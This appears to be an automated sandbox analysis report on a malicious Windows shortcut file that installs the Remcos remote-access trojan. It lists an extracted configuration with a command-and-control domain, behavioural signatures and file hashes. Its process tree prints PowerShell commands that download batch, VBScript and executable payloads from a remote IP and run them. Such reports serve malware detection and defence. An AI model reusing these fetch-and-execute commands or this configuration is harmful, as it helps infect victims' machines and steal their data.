Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
26-09-2024 02:22
Static task
static1
Behavioral task
behavioral1
Sample
be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850.lnk
Resource
win10v2004-20240802-en
General
-
Target
be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850.lnk
-
Size
1KB
-
MD5
383bec1808c99dcffafa9f4e03f104a4
-
SHA1
2f3647ea4331f7848de1c96cef6427b7136ab835
-
SHA256
be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850
-
SHA512
ddb859691e290bb1f4180c086ca92d385918f497506b1b9dc0b1f10b71acb24259b34020b032fb25af64a3ba628e423381106a538e7539f8d9c2617cee11c617
Malware Config
Extracted
remcos
Back-September
fullimmersion777.com:8090
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
hello.exe
-
copy_folder
windw
-
delete_file
false
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
rimcsl-94LESJ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 212 powershell.exe 10 4952 powershell.exe 15 3312 powershell.exe 18 588 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation AUGUST.exe -
Executes dropped EXE 3 IoCs
pid Process 4452 AUGUST.exe 2916 DZIPR.exe 3332 DZIPR.exe -
Loads dropped DLL 2 IoCs
pid Process 2916 DZIPR.exe 3332 DZIPR.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3332 set thread context of 2920 3332 DZIPR.exe 103 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\lnfast_x64.job cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AUGUST.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DZIPR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DZIPR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 212 powershell.exe 212 powershell.exe 4952 powershell.exe 4952 powershell.exe 3312 powershell.exe 3312 powershell.exe 588 powershell.exe 588 powershell.exe 2916 DZIPR.exe 3332 DZIPR.exe 3332 DZIPR.exe 2920 cmd.exe 2920 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3332 DZIPR.exe 2920 cmd.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 212 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 3312 powershell.exe Token: SeDebugPrivilege 588 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 1140 wrote to memory of 4980 1140 cmd.exe 85 PID 1140 wrote to memory of 4980 1140 cmd.exe 85 PID 4980 wrote to memory of 212 4980 cmd.exe 86 PID 4980 wrote to memory of 212 4980 cmd.exe 86 PID 4980 wrote to memory of 4952 4980 cmd.exe 87 PID 4980 wrote to memory of 4952 4980 cmd.exe 87 PID 4980 wrote to memory of 3312 4980 cmd.exe 88 PID 4980 wrote to memory of 3312 4980 cmd.exe 88 PID 4980 wrote to memory of 3368 4980 cmd.exe 89 PID 4980 wrote to memory of 3368 4980 cmd.exe 89 PID 3368 wrote to memory of 3052 3368 cmd.exe 91 PID 3368 wrote to memory of 3052 3368 cmd.exe 91 PID 3052 wrote to memory of 2688 3052 WScript.exe 92 PID 3052 wrote to memory of 2688 3052 WScript.exe 92 PID 2688 wrote to memory of 588 2688 cmd.exe 94 PID 2688 wrote to memory of 588 2688 cmd.exe 94 PID 2688 wrote to memory of 4452 2688 cmd.exe 97 PID 2688 wrote to memory of 4452 2688 cmd.exe 97 PID 2688 wrote to memory of 4452 2688 cmd.exe 97 PID 4452 wrote to memory of 2916 4452 AUGUST.exe 100 PID 4452 wrote to memory of 2916 4452 AUGUST.exe 100 PID 4452 wrote to memory of 2916 4452 AUGUST.exe 100 PID 2916 wrote to memory of 3332 2916 DZIPR.exe 101 PID 2916 wrote to memory of 3332 2916 DZIPR.exe 101 PID 2916 wrote to memory of 3332 2916 DZIPR.exe 101 PID 3332 wrote to memory of 2920 3332 DZIPR.exe 103 PID 3332 wrote to memory of 2920 3332 DZIPR.exe 103 PID 3332 wrote to memory of 2920 3332 DZIPR.exe 103 PID 3332 wrote to memory of 2920 3332 DZIPR.exe 103 PID 2920 wrote to memory of 3120 2920 cmd.exe 110 PID 2920 wrote to memory of 3120 2920 cmd.exe 110 PID 2920 wrote to memory of 3120 2920 cmd.exe 110 PID 2920 wrote to memory of 3120 2920 cmd.exe 110 PID 2920 wrote to memory of 3120 2920 cmd.exe 110
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\Admin\AppData\Roaming/hello.bat && C:\Users\Admin\AppData\Roaming/hello.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\Admin\AppData\Roaming/hello.bat3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\Admin\AppData\Roaming/ffo.bat3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\Admin\AppData\Roaming/hi.vbs3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Roaming/hi.vbs3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\hi.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\ffo.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\Admin\AppData\Roaming/AUGUST.exe6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Users\Admin\AppData\Roaming\AUGUST.exeC:\Users\Admin\AppData\Roaming/AUGUST.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Users\Admin\DZIPR.exe"C:\Users\Admin\DZIPR.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Users\Admin\AppData\Roaming\Ruy_driverv2\DZIPR.exeC:\Users\Admin\AppData\Roaming\Ruy_driverv2\DZIPR.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe10⤵
- System Location Discovery: System Language Discovery
PID:3120
-
-
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
1KB
MD52419d068e09423d5e7edec9bb8010870
SHA1445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba
SHA256d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac
SHA512053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264
-
Filesize
1.2MB
MD5aa0017836788784aab7d99426e976c69
SHA1f743a65577de1b48c35fb045e14ca006c4e881d9
SHA2561f5fb9ecdddc2c8bb69cb12967d529759f0197f881fdeab15eccb80679c43c8b
SHA512e2db1c7992231e434b48153450314dce260451a21c1c601fe5e9f374dcc53fd9e78c2a3084dc1c5c191767be5b213db37f155bc213b323ca5f1d94d3464d235d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.6MB
MD525860926414bf43383246f7c773a8d6c
SHA1760390a4a14df085f4c841067f52c79409cdc93e
SHA256a8e552944846a2f5e8fefea4a250046da29d74d1f58f7a868258e6ded9597958
SHA51261825ef1b03f5516f2820faae3dad01911054debb714b2162fd28cdc7c26199eb6174eddb3e48a4b200c350a083a561a58bd2724496fcb71e87d4492e2ec5a07
-
Filesize
116B
MD5174d3ad77319dc90564354cad267dabf
SHA1b36284dccf4f4d2a7e671d5a2f9dda8197a4c351
SHA256ce2a0fa3ef54c0596a6aa5e4d9e2f06943f0f7e38841823072bd37df73c47569
SHA512fa78883af47a9b47d738dd8acc2990a3cba9339b8a762a7ac98114810a50f9085d223226d00944d814fce5ff43114bc87656afaf752d86ae08a8818b257a40fb
-
Filesize
191B
MD54d8b2d19bdd29e6d89e0769cff9b0b48
SHA107c4469751a5ddf43288b8ea7d32afce71783a2c
SHA2561f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
SHA512dd00356e9fdf149c9890bf71459a5e20b5bc581d62c7a3964a18aaffb32bd7e5210cc9aa8d6251e87ba4ba3ac803b5e720c66ecf161a546a4d36409d1311d3dc
-
Filesize
126B
MD5caa7e3e2db71fa6b41370a69d134fdba
SHA1659cec895d5348e9e1b85823cc9a8f0e165f21cf
SHA256183e1e3b20ea35804ddf2d6102aa4e854730a93f076bb6fe43075b0394d18945
SHA512346f1858a1861d16bf8e858867deaa1653124085c0c320a2776c1a8131e93e6af15156ec6b8457b3648f837485ad4eac584ee83b859f97cbaa80f38b2bf68efd
-
Filesize
346KB
MD5ad28d4167571382569d2384ffd7bd2a9
SHA1efc7534bcb1645d4056702e073519f571d8db77b
SHA256f919a8e63ec0f2f05ac01a6cab4088c13fbf14a38b071cfa9f710c9e069462eb
SHA5128f28867b46dd7a801cbf70d8d7fe5f2bfb8654a417c40ba264faf81af8bb1a28e1a1200fdc9828a4a4c6df0a13817055290c16f9468d311b8d8049a2439348d9
-
Filesize
8.4MB
MD5ec9ce1d67f98072281015c7726fba245
SHA1e89b16265acf4a251b527ddf22830f2650987263
SHA2569ab4145d5525ae741b80f4e66f505abba59adcbe01868dfef84fbe4450634cc1
SHA51221db8f3ae325021589de9c2489ab2ce6814722a17a92476a56147478aa9767ce5c4769169f287060cc08ad76019178ba547fcef32074ef1afb1926845e7158e1
-
Filesize
952KB
MD54649f3a4e58c6040b07f6d486c149a71
SHA164f8fc631c5fb4e5f6bc20c207047d8e2b500587
SHA2565d81ca77492946aa2cfe00349342de8cceb317d8649bedbfd95992dca885f184
SHA5124e1b229d30403b594e992fe0893e568161c8d901fe20461093d11159ab03b5dd410d1834bc64ac4ccc39d4f6b072946703f06eeb982d79b1c9a1b773b57013b7
-
Filesize
70KB
MD5f125e72b3968ca233ef3c7e2f4db34e7
SHA14fb34044ef18cedbd3ede4272c44416d3f11735c
SHA256ced30560c6c0fc15cbdbdbc0d480dca6b41ce3183057e43b419dd6814a33db92
SHA512b645d1eb685a69b9ca9bbdb1f4638af8ae151ddfb9527c423f7779971246ed60f981ce26ce8af2fc7b63164e7c13e9c6e98a7f148831a1e59318e60e5a39f881